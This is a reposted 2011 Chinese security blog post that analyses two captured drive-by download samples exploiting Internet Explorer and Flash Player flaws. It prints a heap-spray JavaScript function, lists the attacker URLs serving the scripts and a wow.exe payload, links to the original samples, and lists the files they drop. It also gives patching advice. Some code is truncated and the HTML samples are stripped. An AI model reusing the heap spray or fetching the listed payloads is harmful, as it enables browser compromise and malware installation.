2011-9-13 18:20:08 捕获两个最新网马样本 IE + Flash 0day

admin 2021年4月3日19:37:33评论71 views字数 13650阅读45分30秒阅读模式

    2011-9-13 18:20:08 捕获两个最新网马样本 IE + Flash 0day,2011-9-13 18:20:08 捕获两个最新网马样本,IE Peers Objects 漏洞 + Adobe Flash Player 漏洞。

    这两个网马,我五、六月打的系统补丁都中,而且无报错、无卡死。

    第一个网马,我测试用 IE 6.0 直接中,火狐 5.01 无视,升级系统补丁至最新解决。第二个网马是最新的 Adobe Flash Player 漏洞。

    由于原始网马源码过于杂乱,以下公布的代码都经过格式化整理,看起来更顺眼,不影响使用。

    同时提供原始网马,下载地址:http://115.com/file/e6vnqa7j。

解决方案:

    1、打系统补丁至最新,网马 A 失效。
    2、升级 Adobe Flash Player 至当前最新版“Adobe Flash Player 10.3.183.7 (2.98 MB)”,网马 B 失效。

写生成器:

    1、极其简单,简单的异或算法,就不多说了。

------------------------------------- ↓ 网马 A ↓ -------------------------------------

网马样本1index.htm:

   
   

       
       
       
   

网马样本1ap.js:

function ac2() {
    a3 = new Array();
    var a5 = 0x86000 - (a4.length * 2);
    var LFlwBa = unescape('%u0c0c%u0c0c');
    while (LFlwBa.length
        LFlwBa += LFlwBa;
    };
    var a6 = LFlwBa.substring(0, a5 / 2);
    delete LFlwBa;
    for (i = 0; i
        a3[i] = a6 + a6 + a4;
    }
}

利用漏洞:

IE Peers Objects 漏洞

挂马地址:

网马分析:

http://w1.bnherw.com:81/index.htm
http://w1.bnherw.com:81/ap.js
http://w1.bnherw.com:81/wow.exe

木马行为:

c:n.scr 创建了
c:DOCUME~1netbarLOCALS~1Temp1315909184.dat 创建了
c:WINDOWSsystem32ksuser.dll 创建了
c:WINDOWSsystem32dllcacheksuser.dll 创建了
c:WINDOWSsystem32TEM1E7.tmp 创建了
c:WINDOWSsystem32midimap.dll 创建了
c:WINDOWSsystem32dllcachemidimap.dll 创建了

360 日志:

时间    拦截内容
18:18:15 已清除 IE浏览器 试图执行恶意脚本 IE Peers Objects 漏洞
18:17:52 已拦截 IE浏览器 访问 http://w1.bnherw.com:81/index.htm [恶意网址]

------------------------------------- ↓ 网马 B ↓ -------------------------------------

网马样本2flash.html:

   
   

       
   

利用漏洞:

最新的 Adobe Flash Player 漏洞,漏洞名字不太清楚,没具体去查。

挂马地址:

网马分析:

http://w1.bnherw.com:81/flash.html
http://w1.bnherw.com:81/wow.exe

木马行为:

c:Documents and SettingsnetbarApplication Dataf.exe 创建了
c:DOCUME~1netbarLOCALS~1Temp1315909199.dat 创建了
c:WINDOWSsystem32ksuser.dll 创建了
c:WINDOWSsystem32dllcacheksuser.dll 创建了
c:WINDOWSsystem32TEM1E8.tmp 创建了
c:WINDOWSsystem32midimap.dll 创建了
c:WINDOWSsystem32dllcachemidimap.dll 创建了

文章来源于lcx.cc:2011-9-13 18:20:08 捕获两个最新网马样本 IE + Flash 0day

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:37:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2011-9-13 18:20:08 捕获两个最新网马样本 IE + Flash 0dayhttps://cn-sec.com/archives/323990.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息